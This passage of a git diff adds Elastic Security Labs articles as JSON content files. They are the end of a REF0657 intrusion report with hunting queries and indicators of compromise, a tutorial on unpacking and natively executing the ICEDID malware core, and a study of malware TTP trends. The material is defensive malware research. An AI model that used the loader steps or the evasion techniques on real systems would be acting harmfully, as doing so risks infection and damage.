Commands](https://www.elastic.co/guide/en/security/current/suspicious-certutil-commands.html)\n* [WMI Incoming Lateral Movement](https://www.elastic.co/guide/en/security/current/wmi-incoming-lateral-movement.html)\n\n### Prevention\n\n* [Ingress Tool Transfer via INET 
Cache](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/command_and_control_ingress_tool_transfer_via_inet_cache.toml)\n* [Potential Masquerading as Windows Error Manager](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_masquerading_as_windows_error_manager.toml)\n* [Potential Lateral Movement via SMBExec](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/lateral_movement_potential_lateral_movement_via_smbexec.toml)\n* [Suspicious Cmd Execution via WMI](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/execution_suspicious_cmd_execution_via_wmi.toml)\n* [RunDLL32 with Unusual Arguments](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_rundll32_with_unusual_arguments.toml)\n* [Suspicious PowerShell Execution](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/execution_suspicious_powershell_execution.toml)\n\n### Hunting queries in Elastic\n\nHunting queries can return a high volume of signals or false positives. 
These queries are used to identify potentially suspicious behavior, but an investigation is required to validate the findings.\n\n#### ES|QL queries\n\nUsing the Timeline section of the Security Solution in Kibana under the “Correlation” tab, you can use the ES|QL queries below to hunt for similar behaviors:\n\n```\nFROM logs-*\n| WHERE process.parent.name == \"sqlservr.exe\" \n AND process.name == \"cmd.exe\" \n AND process.command_line \n RLIKE \".*certutil.*\"\n```\n\n```\nFROM logs-*\n| WHERE process.name == \"ms_edge.exe\" \n AND process.code_signature.exists == false \n AND NOT process.executable \n RLIKE \".*Program Files.*\"\n```\n\n#### YARA\n\nElastic Security has created the following YARA rules to identify this activity:\n\n* [Windows.Trojan.CobaltStrike](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_CobaltStrike.yar)\n* [Windows.Hacktool.SleepObfLoader](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Hacktool_SleepObfLoader.yar)\n* [Multi.Hacktool.Nps](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Multi_Hacktool_Nps.yar)\n* [Multi.Hacktool.Rakshasa](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Multi_Hacktool_Rakshasa.yar)\n* [Windows.Hacktool.Iox](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Hacktool_Iox.yar)\n\n## Observations\n\nAll observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/ref0657) in both ECS and STIX format in a combined zip bundle.\n\nThe following observables were discussed in this research.\n\n| Observable | Type | Name | Reference |\n|------------------------------------------------------------------|-------------|-------------|--------------------------------------------|\n| 206.237.3[.]150 | ipv4-addr | | File hosting infrastructure |\n| 206.237.0[.]49 | ipv4-addr | | File hosting and supershell infrastructure |\n| 104.21.54[.]126 
| ipv4-addr | | Cobalt Strike infrastructure |\n| 149.104.23[.]176 | ipv4-addr | | |\n| msedge[.]one | domain-name | | Cobalt Strike infrastructure |\n| bc90ef8121d20af264cc15b38dd1c3a866bfe5a9eb66064feb2a00d860a0e716 | SHA-256 | mscoree.dll | |\n| 84b3bc58ec04ab272544d31f5e573c0dd7812b56df4fa445194e7466f280e16d | SHA-256 | MSASN1.dll | |\n\n## About Elastic Security Labs\n\nElastic Security Labs is the threat intelligence branch of Elastic Security dedicated to creating positive change in the threat landscape. Elastic Security Labs provides publicly available research on emerging threats with an analysis of strategic, operational, and tactical adversary objectives, then integrates that research with the built-in detection and response capabilities of Elastic Security.\n\nFollow Elastic Security Labs on Twitter [@elasticseclabs](https://twitter.com/elasticseclabs?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor) and check out our research at [www.elastic.co/security-labs/](https://www.elastic.co/security-labs/). "
+ },
+ "title": "Unmasking a Financial Services Intrusion: REF0657",
+ "slug": "unmasking-financial-services-intrusion-ref0657",
+ "subtitle": "Elastic Security Labs details an intrusion leveraging open-source tooling and different post-exploitation techniques targeting the financial services industry in South Asia.",
+ "date": "2024-01-31",
+ "description": "Elastic Security Labs details an intrusion leveraging open-source tooling and different post-exploitation techniques targeting the financial services industry in South Asia.",
+ "author": [
+ {
+ "slug": "daniel-stepanic"
+ },
+ {
+ "slug": "salim-bitam"
+ },
+ {
+ "slug": "andrew-pease"
+ }
+ ],
+ "image": "photo-edited-08@2x.jpg",
+ "category": [
+ {
+ "slug": "attack-pattern"
+ }
+ ],
+ "tags": [
+ "ref0657",
+ "nps",
+ "cobalt strike",
+ "iox",
+ "rakshasa",
+ "supershell"
+ ]
+ },
+ "id": "security_labs_content-unmasking_financial_services_intrusion_ref0657-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-unpacking_icedid-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-unpacking_icedid-md.json
new file mode 100644
index 00000000000..c2c38868aa6
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-unpacking_icedid-md.json
@@ -0,0 +1,28 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Unpacking ICEDID\"\nslug: \"unpacking-icedid\"\ndate: \"2023-05-04\"\nsubtitle: \"A comprehensive tutorial with Elastic Security Labs open source tools\"\ndescription: \"ICEDID is known to pack its payloads using custom file formats and a custom encryption scheme. We are releasing a set of tools to automate the unpacking process and help analysts and the community respond to ICEDID.\"\nauthor:\n - slug: cyril-francois\nimage: \"photo-edited-07@2x.jpg\"\ncategory:\n - slug: tools\ntags:\n - icedid\n---\n\n## Preamble\n\nICEDID is a malware family [discovered](https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/) in 2017 by IBM X-Force researchers and is associated with the theft of login credentials, banking information, and other personal information. ICEDID has always been a prevalent family but achieved even more growth since EMOTET’s temporary [disruption](https://www.justice.gov/opa/pr/emotet-botnet-disrupted-international-cyber-operation) in early 2021. ICEDID has been linked to the distribution of several distinct malware families including [DarkVNC](https://malpedia.caad.fkie.fraunhofer.de/details/win.darkvnc) and [COBALT STRIKE](https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot). Regular industry reporting, including research publications like this one, helps mitigate this threat.\n\nICEDID is known to pack its payloads using custom file formats and a custom encryption scheme. 
This post follows our latest [ICEDID research](https://www.elastic.co/security-labs/thawing-the-permafrost-of-icedid-summary), which covers the GZip variant execution chain.\n\nIn this tutorial, we will introduce these tools by unpacking a recent ICEDID sample, starting with downloading a copy of the fake GZip binary:\n\n**Analyzing malware can be dangerous to systems and should only be attempted by experienced professionals in a controlled environment, like an isolated virtual machine or analysis sandbox. Malware can be designed to evade detection and infect other systems, so it's important to take all necessary precautions and use specialized tools to protect yourself and your systems.**\n\n[**54d064799115f302a66220b3d0920c1158608a5ba76277666c4ac532b53e855f**](https://bazaar.abuse.ch/sample/54d064799115f302a66220b3d0920c1158608a5ba76277666c4ac532b53e855f/)\n\n## Environment setup\n\nFor this tutorial, we’re using Windows 10 and Python 3.10.\n\nElastic Security Labs is releasing a set of tools to automate the unpacking process and help analysts and the community respond to ICEDID.\n\n| Script | Description | Compatibility |\n| ----------------------------------------- | ---------------------------------------------------------------- | ------------------------------- |\n| decrypt_file.py | Decrypt ICEDID encrypted file | Windows and others (not tested) |\n| gzip_variant/extract_gzip.py | Extract payloads from ICEDID fake GZip file | Windows and others (not tested) |\n| gzip_variant/extract_payload_from_core.py | Extract and decrypt payloads from the rebuilt ICEDID core binary | Windows and others (not tested) |\n| gzip_variant/load_core.py | Load and execute core custom PE binary | Windows only |\n| gzip_variant/read_configuration.py | Read ICEDID configuration file contained in the fake GZip | Windows and others (not tested) |\n| rebuild_pe.py | Rebuild a PE from ICEDID custom PE file | Windows and others (not tested) |\n\nIn order to use the tools, clone the [Elastic 
Security Labs release repository](https://github.com/elastic/labs-releases) and install the nightMARE module.\n\n```\ngit clone https://github.com/elastic/labs-releases\ncd labs-releases\npip install .\\nightMARE\\\n```\n\n> All tools in this tutorial use the **nightMARE** module; this library implements different algorithms we need for unpacking the various payloads embedded within ICEDID. We’re releasing nightMARE because it is required for this ICEDID analysis, but stay tuned - more to come as we continue to develop and mature this framework.\n\n## Unpacking the fake GZip\n\nThe ICEDID fake GZip is a file that [masquerades](https://attack.mitre.org/techniques/T1036/008/) as a valid GZip file by encapsulating the real data with a [GZip header and footer](https://docs.fileformat.com/compression/gz/).\n\n\n\nGZip magic bytes appear in red. \nThe GZip header is rendered in green. \nThe dummy filename value is blue.\n\nAfter the GZip header is the true data structure, which we describe below.\n\n\n\nWe will use the **labs-releases\\tools\\icedid\\gzip-variant\\extract_gzip.py** script to unpack this fraudulent GZip.\n\n```\nusage: extract_gzip.py [--help] input output\n\npositional arguments:\n input Input file\n output Output directory\n\noptions:\n -h, --help show this help message and exit\n```\n\nWe'll use extract_gzip.py on the ICEDID sample linked above and store the contents into a folder we created called “ **extract** ” (you can use any existing output folder).\n\n```\npython extract_gzip.py 54d064799115f302a66220b3d0920c1158608a5ba76277666c4ac532b53e855f extract\n\n============================================================\nFake Gzip\n============================================================\nis_dll: True\ncore: UponBetter/license.dat (354282 bytes)\nstage_2: lake_x32.tmp (292352 bytes)\n\nextract\\configuration.bin\nextract\\license.dat\nextract\\lake_x32.tmp\n```\n\nThis script returns three individual files consisting of:\n\n- The encrypted 
configuration file: **configuration.bin**\n- The encrypted core binary: **license.dat**\n- The persistence loader: **lake_x32.tmp**\n\n\n\n## Decrypting the core binary and configuration files\n\nThe configuration and the core binary we extracted are encrypted using ICEDID’s custom encryption scheme. We can decrypt them with the **labs-releases\\tools\\icedid\\decrypt_file.py** script.\n\n```\nusage: decompress_file.py [--help] input output\n\npositional arguments:\n input Input file\n output Output file\n\noptions:\n -h, --help show this help message and exit\n```\n\nAs depicted here (note that decrypted files can be written to any valid destination):\n\n```\npython .\\decrypt_file.py .\\extract\\license.dat .\\extract\\license.dat.decrypted\n\npython .\\decrypt_file.py .\\extract\\configuration.bin .\\extract\\configuration.bin.decrypted\n```\n\nThe core binary and the configuration are now ready to be processed by additional tools. See the data from the decrypted configuration presented in the following screenshot:\n\n\n\n## Reading the configuration\n\nThe configuration file format is presented below.\n\n\n\nThe configuration can be read using the **labs-releases\\tools\\icedid\\gzip-variant\\read_configuration.py** script.\n\n```\nusage: read_configuration.py [--help] input\n\npositional arguments:\n input Input file\n\noptions:\n -h, --help show this help message and exit\n```\n\nWe’ll use the **read_configuration.py** script to read the **configuration.bin.decrypted** file we collected in the previous step.\n\n```\npython .\\gzip-variant\\read_configuration.py .\\extract\\configuration.bin.decrypted\n\n============================================================\nConfiguration\n============================================================\nbotnet_id: 0x3B7D6BA4\nauth_var: 0x00000038\nuri: /news/\ndomains:\n alishaskainz.com\n villageskaier.com\n```\n\nThis configuration contains two C2 domains:\n\n- alishaskainz[.]com\n- villageskaier[.]com\n\nFor this 
sample, the beaconing URI that ICEDID uses is “ **/news/** ”.\n\n## Rebuilding the core binary for static analysis\n\nICEDID uses a custom PE format to obfuscate its payloads, thus defeating static or dynamic analysis tools that expect to deal with a normal Windows executable. The custom PE file format is described below.\n\n\n\nIf we want to analyze the core binary, for example with [IDA Pro](https://hex-rays.com/IDA-pro/), we need to rebuild it into a valid PE. We use the **labs-releases\\tools\\icedid\\rebuild_pe.py** script.\n\n```\nusage: rebuild_pe.py [--help] [-o OFFSET] input output\n\npositional arguments:\n input Input file\n output Output reconstructed PE\n\noptions:\n -h, --help show this help message and exit\n -o OFFSET, --offset OFFSET\n Offset to real data, skip possible garbage\n```\n\nHowever, when attempting to use **rebuild_pe.py** on the decrypted core binary, **license.dat.decrypted** , we receive the following error message:\n\n```\npython .\\rebuild_pe.py .\\extract\\license.dat.decrypted .\\extract\\core.bin\nTraceback (most recent call last):\n File \"rebuild_pe.py\", line 32, in <module>\n main()\n File \"rebuild_pe.py\", line 28, in main\n custom_pe.CustomPE(data).to_pe().write(args.output)\n File \"nightmare\\malware\\icedid\\custom_pe.py\", line 86, in __init__\n raise RuntimeError(\"Failed to parse custom pe\")\nRuntimeError: Failed to parse custom pe\n```\n\nThe subtlety here is that the custom PE data doesn’t always start at the beginning of the file. In this case, for example, if we open the file in a hexadecimal editor like [HxD](https://mh-nexus.de/en/hxd/) we can observe a certain amount of garbage bytes before the actual data.\n\n\n\nWe know from our research that the size of the garbage is **129** bytes.\n\n\n\nWith that in mind, we can skip over the garbage bytes and rebuild the core binary using the **rebuild_pe.py** script with the **“-o 129”** parameter. This time, fortunately, we receive no error message. 
**core.bin** will be saved to the output directory, **extract** in our example.\n\n```\npython .\\rebuild_pe.py .\\extract\\license.dat.decrypted .\\extract\\core.bin -o 129\n```\n\nThe rebuilt PE object is **not** directly executable but you can statically analyze it using your disassembler of choice.\n\n\n\nWe assigned custom names to the rebuilt binary sections ( **.mare\\{0,1,2,...\\}** ).\n\n\n\nWe want to credit and thank [Hasherezade’s work](https://github.com/hasherezade/funky_malware_formats/blob/f1cacba4ee347601dceacda04e4de8c699971d29/iced_id_parser/iceid_to_pe.cpp#L10) from which we took inspiration to build this tool.\n\n## Executing the core binary (Windows only)\n\nThe core binary can’t be executed without a custom loader that understands ICEDID’s custom PE format as well as the entry point function prototype.\n\nFrom our research, we know that the entry point expects a structure we refer to as the context structure, which contains ICEDID core and persistence loader paths with its encrypted configuration. The context structure is described below.\n\n\n\nTo natively execute the core binary we use the **labs-releases\\tools\\icedid\\gzip-variant\\load_core.py** script, but before using it we need to create the **context.json** file that’ll contain all the information needed by this script to build this structure.\n\nFor this sample, we copy the information contained in the fake gzip and we use the path to the encrypted configuration file. We’ve included an example at **gzip_variant/context.json.example**.\n\n\n\nPlease note that **“field_0”** and **“stage_2_export”** values have to be found while reversing the sample.\n\n\n\nHere we use values from our previous research as placeholders but we have no guarantee that the sample will work 100%. 
For example, in this sample, we don’t know if the **#1** ordinal export is the actual entry point of the persistence loader.\n\nWe also reproduce the first stage behavior by creating the **UponBetter** directory and moving the **license.dat** file into it.\n\n\n\nWe execute the **labs-releases\\tools\\icedid\\gzip_variant\\load_core.py** script using the **decrypted core** binary ( **license.dat.decrypted** ) and the **context.json** file.\n\n**WARNING: The binary is going to be loaded/executed natively by this script; Elastic Security Labs does not take responsibility for any damage to your system. Please execute only within a safe environment.**\n\n```\nusage: load_core.py [--help] [-o OFFSET] core_path ctx_path\n\npositional arguments:\n core_path Core custom PE\n ctx_path Path to json file defining core's context\n\noptions:\n -h, --help show this help message and exit\n -o OFFSET, --offset OFFSET\n Offset to real data, skip possible garbage\n```\n\nBecause we have the same garbage bytes problem as stated in the previous section, we use the **“-o 129”** parameter to skip over the garbage bytes.\n\n```\npython .\\gzip-variant\\load_core.py .\\extract\\license.dat.decrypted .\\gzip-variant\\context.example.json -o 129\n\n============================================================\nCore Loader\n============================================================\nBase address: 0x180000000\nEntrypoint: 0x180001390\n\nPress a key to call entrypoint...\n```\n\nWhen launched, the script will wait for user input before calling the entry point. 
We can easily attach a debugger to the Python process and set a breakpoint on the ICEDID core entry point (in this example **0x180001390** ).\n\n\n\nOnce the key is pressed, we reach the entry point.\n\n\n\nIf we let the binary execute, we see ICEDID threads being created (indicated in the following screenshot).\n\n\n\n## Unpacking and rebuilding payloads from the rebuilt core binary\n\nTo extract any of the payloads embedded inside the core binary, we will use the **labs-releases\\tools\\icedid\\gzip-variant\\extract_payloads_from_core.py** script.\n\n```\nusage: extract_payloads_from_core.py [--help] input output\n\npositional arguments:\n input Input file\n output Output directory\n\noptions:\n -h, --help show this help message and exit\n```\n\nWe’ll use this script on the rebuilt core binary.\n\n```\npython .\\gzip-variant\\extract_payloads_from_core.py .\\extract\\core.bin core_extract\n\ncore_extract\\browser_hook_payload_0.cpe\ncore_extract\\browser_hook_payload_1.cpe\n```\n\nFrom here, we output two binaries corresponding to ICEDID’s payloads for web browser hooking capabilities; however, they are still in their custom PE format.\n\n\n\nBased on our research, we know that **browser_hook_payload_0.cpe** is the x64 version of the browser hook payload and **browser_hook_payload_1.cpe** is the x86 version.\n\n\n\nIn order to rebuild them, we use the **rebuild_pe.py** script again; this time there are no garbage bytes to skip over.\n\n```\npython .\\rebuild_pe.py .\\core_extract\\browser_hook_payload_0.cpe .\\core_extract\\browser_hook_payload_0.bin\n\npython .\\rebuild_pe.py .\\core_extract\\browser_hook_payload_1.cpe .\\core_extract\\browser_hook_payload_1.bin\n```\n\nNow we have two PE binaries ( **browser_hook_payload_0.bin** and **browser_hook_payload_1.bin** ) that we can further analyze.\n\n\n\nAttentive readers may observe that we have skipped the **VNC server** unpacking from the core binary, a decision we made intentionally. 
We will release it along with other tools in upcoming research, so stay tuned!\n\n## Conclusion\n\nIn this tutorial, we covered ICEDID GZip variant unpacking, starting with the extraction of the fake GZip binary, followed by the reconstruction of the core binary and unpacking its payloads.\n\nICEDID is constantly evolving, and we are going to continue to monitor major changes and update our tooling along with our research. Feel free to [open an issue](https://github.com/elastic/labs-releases/issues) or [send us a message](mailto:threat-notification@elastic.co) if something is broken or doesn’t work as expected.\n\nElastic Security Labs is a team of dedicated researchers and security engineers focused on disrupting adversaries through the publication of detailed detection logic, protections, and applied threat research.\n\nFollow us on [@elasticseclabs](https://twitter.com/elasticseclabs) and visit our research portal for more resources and research.\n\n## References\n\nThe following were referenced throughout the above research:\n\n- [https://www.elastic.co/pdf/elastic-security-labs-thawing-the-permafrost-of-icedid.pdf](https://www.elastic.co/pdf/elastic-security-labs-thawing-the-permafrost-of-icedid.pdf)\n- [https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/](https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/)\n- [https://www.justice.gov/opa/pr/emotet-botnet-disrupted-international-cyber-operation](https://www.justice.gov/opa/pr/emotet-botnet-disrupted-international-cyber-operation)\n- [https://malpedia.caad.fkie.fraunhofer.de/details/win.darkvnc](https://malpedia.caad.fkie.fraunhofer.de/details/win.darkvnc)\n- [https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot](https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot)\n- 
[https://github.com/elastic/labs-releases](https://github.com/elastic/labs-releases)\n- [https://github.com/hasherezade/funky_malware_formats/blob/f1cacba4ee347601dceacda04e4de8c699971d29/iced_id_parser/iceid_to_pe.cpp](https://github.com/hasherezade/funky_malware_formats/blob/f1cacba4ee347601dceacda04e4de8c699971d29/iced_id_parser/iceid_to_pe.cpp)\n- [https://mh-nexus.de/en/hxd/](https://mh-nexus.de/en/hxd/)\n- [https://hex-rays.com/IDA-pro/](https://hex-rays.com/IDA-pro/)\n"
+ },
+ "title": "Unpacking ICEDID",
+ "slug": "unpacking-icedid",
+ "subtitle": "A comprehensive tutorial with Elastic Security Labs open source tools",
+ "date": "2023-05-04",
+ "description": "ICEDID is known to pack its payloads using custom file formats and a custom encryption scheme. We are releasing a set of tools to automate the unpacking process and help analysts and the community respond to ICEDID.",
+ "author": [
+ {
+ "slug": "cyril-francois"
+ }
+ ],
+ "image": "photo-edited-07@2x.jpg",
+ "category": [
+ {
+ "slug": "tools"
+ }
+ ],
+ "tags": [
+ "icedid"
+ ]
+ },
+ "id": "security_labs_content-unpacking_icedid-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-unveiling_malware_behavior_trends-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-unveiling_malware_behavior_trends-md.json
new file mode 100644
index 00000000000..183ebf32ba4
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-unveiling_malware_behavior_trends-md.json
@@ -0,0 +1,25 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Unveiling malware behavior trends\"\nslug: \"unveiling-malware-behavior-trends\"\ndate: \"2024-03-20\"\nsubtitle: \"Analyzing a Windows dataset of over 100,000 malicious files\"\ndescription: \"An analysis of a diverse dataset of Windows malware extracted from more than 100,000 samples revealing insights into the most prevalent tactics, techniques, and procedures.\"\nauthor:\n - slug: samir-bousseaden\nimage: \"Security Labs Images 20.jpg\"\ncategory:\n - slug: security-research\n---\n\n## Preamble\n\nWhen prioritizing detection engineering efforts, it's essential to understand the most prevalent tactics, techniques, and procedures (TTPs) observed in the wild. This knowledge helps defenders make informed decisions about the most effective strategies to implement - especially where to focus engineering efforts and finite resources.\n\nTo highlight these prevalent TTPs, we analyzed over [100,000 Windows malware samples](https://gist.github.com/Samirbous/eebeb8f776f7ab2d51cdd2ac05669dcf) extracted over several months from one of our dynamic malware analysis tools, [Detonate](https://www.elastic.co/security-labs/click-click-boom-automating-protections-testing-with-detonate). To generate this data and alerts, we leveraged Elastic Defend behavior (mapped to MITRE ATT&CK) and [memory threat detection](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html#memory-protection) rules. 
It should be noted that this dataset is not exhaustive; it may not represent the entire spectrum of malware behavior and specifically does not include long-term or interactive activity.\n\nBelow is an [ES|QL](https://www.elastic.co/blog/esql-elasticsearch-piped-query-language) query to summarize our dataset by file type:\n\n\n\n\n## Tactics\n\nBeginning with tactics, we aggregated the alerts generated by this corpus of malware samples and organized them according to the counts of [```process.entity_id```](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-entity-id) and alerts. As depicted in the image below, the most frequent tactics included defense evasion, privilege escalation, execution, and persistence. Certain tactics commonly linked with post-exploitation activities, such as lateral movement, showed an anticipated lower prevalence because these actions are commonly driven manually by the threat actor after the initial implant is established vs. being automated by the malware in our dataset.\n\n\n\n\nIn the following sections, we will delve into each tactic and the techniques and sub-techniques of each that exerted the most influence.\n\n### Defense Evasion\n\nDefense Evasion involves methods employed by adversaries to avoid detection by security teams or capabilities. The foremost tactic detected was defense evasion, triggering 189 distinct detection rules (nearly 40% of our current Windows rules). 
The primary techniques noted are associated with [code injection](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1055%22&type=code), [defense tampering](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22Impair+Defenses%22&type=code), [masquerading](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22Masquerade+Task+or+Service%22&type=code), and [system binary proxy execution](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1218%22&type=code).\n\n\n\n\nWhen we pivot by sub-techniques, it becomes evident that certain advanced techniques such as [DLL side-loading](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22DLL+Side-Loading%22&type=code&p=1) and [Parent PID Spoofing](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts%20%22Parent%20PID%20Spoofing%22&type=code) have become increasingly popular, even among non-targeted malware. Both are frequently linked with code injection and masquerading.\n\nFurthermore, system binary proxies [```Rundll32```](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1218.011%22&type=code) and [```Regsvr32```](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1218.010%22&type=code) remain highly abused, with a notable rise in the utilization of malicious [MSI installers](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1218.007%22&type=code) for malware delivery. 
The practice of [masquerading](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22Masquerade+Task+or+Service%22&type=code) as legitimate system binaries, whether through renaming or process hollowing, remains prevalent as well, serving as a means to evade user suspicion.\n\n\n\n\nTampering with Windows Defender stands out as the most frequently observed defense evasion technique, emphasizing the importance for defenders to acknowledge that adversaries will attempt to obscure their activities. \n\nProcess Injection is prevalent across various malware families, whether they target legitimate system binaries remotely to blend in or employ self-injection (sometimes paired with DLL side-loading through a trusted binary). Furthermore, there is a noticeable uptick in the use of NTDLL unhooking to bypass security solutions reliant on user-mode API monitoring (Elastic Defend is not impacted).\n\n\n\n\nFrom our shellcode alerts, we can clearly see that self-injection is more prevalent than remote injection: \n\n\n\n\nAlmost 50 unique vendors’ binaries were abused for DLL side-loading, with Microsoft as the top choice: \n\n\n\n\nDefense evasion comprises various techniques and sub-techniques necessitating comprehensive coverage due to their frequent occurrence. For instance, apart from [memory threat protection](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html#memory-protection), [half](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts++name+%3D+%22Defense+Evasion%22&type=code) of our rules are specifically tailored to address this tactic.\n\n### Privilege Escalation\n\nThis tactic consists of techniques that adversaries use to gain greater permissions on a system or network. 
The most commonly used techniques relate to [access token manipulation](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1134%22&type=code), execution through privileged [system services](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1543.003%22&type=code), and bypassing [User Account Control](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1548.002%22&type=code).\n\n\n\n\nThe most frequently observed sub-technique involved impersonation as the Trusted Installer service, which aligns closely with defense evasion and often precedes attempts to manipulate system-protected resources. \n\nConcerning User Account Control bypass, the primary method we observed was elevation by [mimicking trusted directories](https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e), which is also related to DLL side-loading. Additionally, other methods like elevation via [extended startupinfo](https://github.com/decoder-it/psgetsystem) (elevated parent PID spoofing) are increasingly prevalent among commodity malware.\n\n\n\n\nAs evident from the list below, there's a notable rise in the use of [vulnerable drivers](https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks) (BYOVD) to manipulate protected objects and acquire kernel mode execution privileges. \n \n\n\n\nBelow, you'll find a list of the most commonly exploited drivers triggered by our [YARA rules](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts%20vulndriver&type=code):\n\n\n\n\n### Execution\n\nExecution encompasses methods that lead to running adversary-controlled code on a local or remote system. These techniques are frequently combined with methods from other tactics to accomplish broader objectives, such as network reconnaissance or data theft. 
\n\nThe most common techniques observed here involved [Windows command and scripting languages](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22Command+and+Scripting+Interpreter%22+%5B%22windows%22%5D&type=code), with the proxying of execution via the [Windows Management Instrumentation](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1047%22&type=code) (WMI) interface closely trailing behind.\n\n\n\n\n[PowerShell](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1059.001%22&type=code) remains a preferred scripting language for malware execution chains, followed by [JavaScript](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1059.007%22&type=code) and [VBScript](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1059.005%22&type=code). Multi-stage malware delivery routinely involves a combination of two or more scripting languages.\n\n\n\n\nHere is a list of the most frequently triggered endpoint behavior detections for this tactic:\n\n\n\n\nWindows' default scripting languages remain the top preference for malware execution. However, there has been a slight shift toward third-party scripting interpreters such as Python, AutoIt, Java, and Lua.\n\n### Persistence\n\nIt's common for malware to install itself on an infected host. 
No surprises here: the most frequently observed persistence methods include [scheduled tasks](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1053.005%22&type=code), the [run key and startup folder](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1547.001%22&type=code), and [Windows services](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1543.003%22&type=code) (which typically require administrator privileges).\n\n\n\n\nThe top three persistence sub-techniques depicted in the list below are also commonly encountered in regular software installations. Therefore, it's necessary to dissect them into multiple detections with additional suspicious signals to reduce false positives and enhance precision.\n\n\n\n\n### Initial Access\n\nConsidering the dataset's composition, initial access was associated with primarily macro-enabled documents and Windows shortcut objects. Although a significant portion of the detonated samples also involved other formats, such as ISO/VHD containers with MSI installers extensively utilized for delivery, their genuine malicious behavior typically manifests in areas such as defense evasion and persistence.\n\n\n\n\nThe most frequently abused Microsoft-signed binaries originating from malicious Microsoft Office documents align closely with execution and defense evasion tactics, command and scripting interpreters, and system binary proxy execution.\n\n\n\n\nHere is a list of the most frequently triggered detections for initial access, regarding [phishing attachments](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1566.001%22&type=code):\n\n\n\n\n### Credential Access\n\nCredential access in malware is frequently linked to information stealers. 
The most targeted credentials are typically associated with [Windows Credential Manager](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1555.004%22&type=code) and [browser password](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1555.003%22&type=code) stores. Domain and system-protected credentials require elevated privileges and are more likely a feature of a subsequent stage.\n\n\n\n\nBelow is a breakdown of the endpoint behavior detections that triggered the most on credential access: \n\n\n\n\nThe majority of credential access behaviors resemble typical file access events. Therefore, it's essential to correlate and enrich them with additional signals to reduce false positives and enhance comprehension.\n\n## Conclusion\n\nEven though this small dataset of about [100,000 malware samples](https://gist.github.com/Samirbous/eebeb8f776f7ab2d51cdd2ac05669dcf) represents only a fraction of the possible malware in the wild right now, we can still derive important insights from it about the most common TTPs using our behavioral detections. Those insights help us make decisions about detection engineering priorities, and defenders should make them part of their strategies."
+ },
+ "title": "Unveiling malware behavior trends",
+ "slug": "unveiling-malware-behavior-trends",
+ "subtitle": "Analyzing a Windows dataset of over 100,000 malicious files",
+ "date": "2024-03-20",
+ "description": "An analysis of a diverse dataset of Windows malware extracted from more than 100,000 samples revealing insights into the most prevalent tactics, techniques, and procedures.",
+ "author": [
+ {
+ "slug": "samir-bousseaden"
+ }
+ ],
+ "image": "Security Labs Images 20.jpg",
+ "category": [
+ {
+ "slug": "security-research"
+ }
+ ]
+ },
